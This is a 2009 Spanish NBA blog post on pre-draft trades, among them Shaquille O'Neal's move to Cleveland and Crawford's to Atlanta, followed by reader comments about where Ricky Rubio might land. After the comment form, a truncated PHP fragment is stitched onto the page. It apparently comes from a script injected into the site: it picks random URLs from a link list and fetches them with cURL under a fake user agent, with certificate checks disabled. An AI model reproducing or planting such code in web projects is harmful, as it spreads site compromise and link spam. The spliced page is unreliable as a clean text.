Que el ritmo no pare

25 de June de 2009 por txusma

El draft se acerca y con él los traspasos, los rumores y los nervios. Tras los 2 importantes traspasos de ayer hoy nos despertamos con otros 2 que no tienen absolutamente nada que envidiarles. El más importante, sin duda, es el que ha involucrado a Cleveland y Phoenix. Atención, que Shaquille O’Neal jugará al lado de Lebron James a cambio de Ben Wallace y Sasha Pavlovic. Último intento de Big Cactus para ganar de nuevo el anillo y una pieza más (¿la definitiva?) en la maquinaria que rodea a Lebron. Considerando lo que se avecina en el 2010 puede ser, también, la última oportunidad de los Cavaliers en muuuuchos años de lograr la preciada sortija.

Y en otro traspaso del día, Jamaal Crawford jugará en los Hawks a cambio de Acie Law y Speedy Claxton. Este traspaso puede tener muchas implicaciones y lecturas: por un lado hemos de recordar que Mike Bibby es agente libre este verano y por el otro no podemos dejar de pensar en las informaciones que rodeaban a los Warriors sobre el hecho de escoger un PG en el draft de esta misma noche.

Y completando el día del mercado, un mini-traspaso con vistas al draft: los Blazers se han hecho con la elección 22 de los Mavs a cambio de la 24 y la 56 de este año y la peor de las segundas rondas del 2010.  ¿Qué ha movido a Portland a adelantar 2 posiciones en el draft? Se habla de Omar Casspi, que sonaba para los Kings en la 23. Por su parte, Dallas sigue pensando elegir a su hombre en la 24, así que han ganado elecciones por casi nada.

Comenta

11 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Lo de Shaq junto a Lebron a mi directamente de ma pánico, con un Shaq como el de este año los Cavs se colocan junto a los Lakers como máximos favoritos, ni un centímetro mas abajo que los campeones.

      Citar

  2. Jona dice:
    #2

    Me cago en todo este año se creía en loa warriors si les respetaban las esiones tenían un
    Quinteto potente con biedrins randloph jackson crawford y ellis. Además el banquillo era de garantias con
    Bellineli morrow azubuike maggete turiaf…lo que necesitan es un center suplente….vuelve davis!! We believe!!!

      Citar

  3. pcerezo dice:
    #3

    Hey Txusma,

    Soy PCerezo del blog de Daimiel.
    Mira macho que tienes tiempo para hacer todos estos análisis, te envidio de veras.

    Si me pasas tu mail, me gustaría colaborar contigo si fuera posible con algún artículo o comentario.
    Sin compormisos.

    Yo sigo pensando que el mejor destino de Ricky es Oklahoma Thunders, le veo el mejor futuro tanto a nivel individual como colectivo.

    No confío en Shaq. Ya no. Puede que me equivoque, pero no le tengo yo mucha fe a este traspaso.
    Yo creo que si los Lakers retienen a Odom y Ariza van a ser favoritos junto a Celtics (si se recupera Garnett de sus lesiones).

    Un saludo,
    PCerezo

      Citar

  4. Dantley2 dice:
    #4

    El trade raro ese de Portland tiene simplemente el sentido de que les sobran rondas, así que mejor utilizarlos en subir dos que draftear por draftear, el 56 de este año debe ser realmente malo y la peor 2ª del que viene tampoco debe ser una maravilla. Personalmente no lo hubiera hecho, pero tampoco es descabellado.

    Los Knicks parece que se han hecho con la 29 por cash, algo habrán visto y los Lakers no habrán visto nada.

    No recuerdo un draft tan difícil de predecir, supongo que la calidad (baja) también tendrá que ver, salvo en bases.

      Citar

  5. Txusma dice:
    #5

    Buenas pcerezo,

    lo primero q he de decir es q el blog no es solo mio. Lo llevamos un grupito de aficionados a la NBA que dedicamos parte de nuestro tiempo libre en informar, analizar y opinar sobre la mejor liga del mundo. A lo mejor te suena TheDeerHunter, hace tiempo un asiduo del blog de daimiel. Un dia se paso por aqui y le debio gustar lo q vio pq se quedo con nosotros.
    Para cualquier cosa, el mail es txusma@tjnba.com.

    un saludo

      Citar

  6. Txusma dice:
    #6

    Y hablando del draft…

    La mayoria de la gente parece tener claro q el destino ideal para Ricky son los Kings, con un solar en el puesto de base y sin un autentico lider claro en la pista, rol que en unos años podria llegar a ocupar el. En los Thunder se encontraria con Westbrook q ha hecho un muy bien año jugando en la posicion de base y a un Durant con un futuro como alma de la franquicia larguisimo. Tampoco le vendrian mal los Wolves…

      Citar

  7. Dantley2 dice:
    #7

    Pues Givony (draftexpress) está ahora bastante convencido de que Ricky va a Oklahoma, aunque también existe la posibilidad de que sea un farol para provocar algún trade hacia arriba de Minnesota o Sacramento

      Citar

  8. Jabho dice:
    #8

    Pues a mi no me gusta el solar de los Kings. Tienen mejor pinta los Thunder y sobretodo los Wolves. Con Rubio y uno entre Evans/Harden te queda un juego exterior compensado y con Love/Al Jeff por dentro habría que sumar veterania y saber jugar, pero pintaría muy, muy bien.ç

      Citar

  9. Noelinho dice:
    #9

    Ojito, Carter x Lee, Alston y Battie!!

      Citar

  10. 24KB dice:
    #10

    Hay alguna posibilidad de que Ricky acabe en Washington?yo lo veo un gran equipo si se va alli y desplaza al agente a la posicion de escolta

      Citar

  11. Queco dice:
    #11

    24KB please, pasate al post del draft en directo que es donde haremos el seguimiento 😉

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>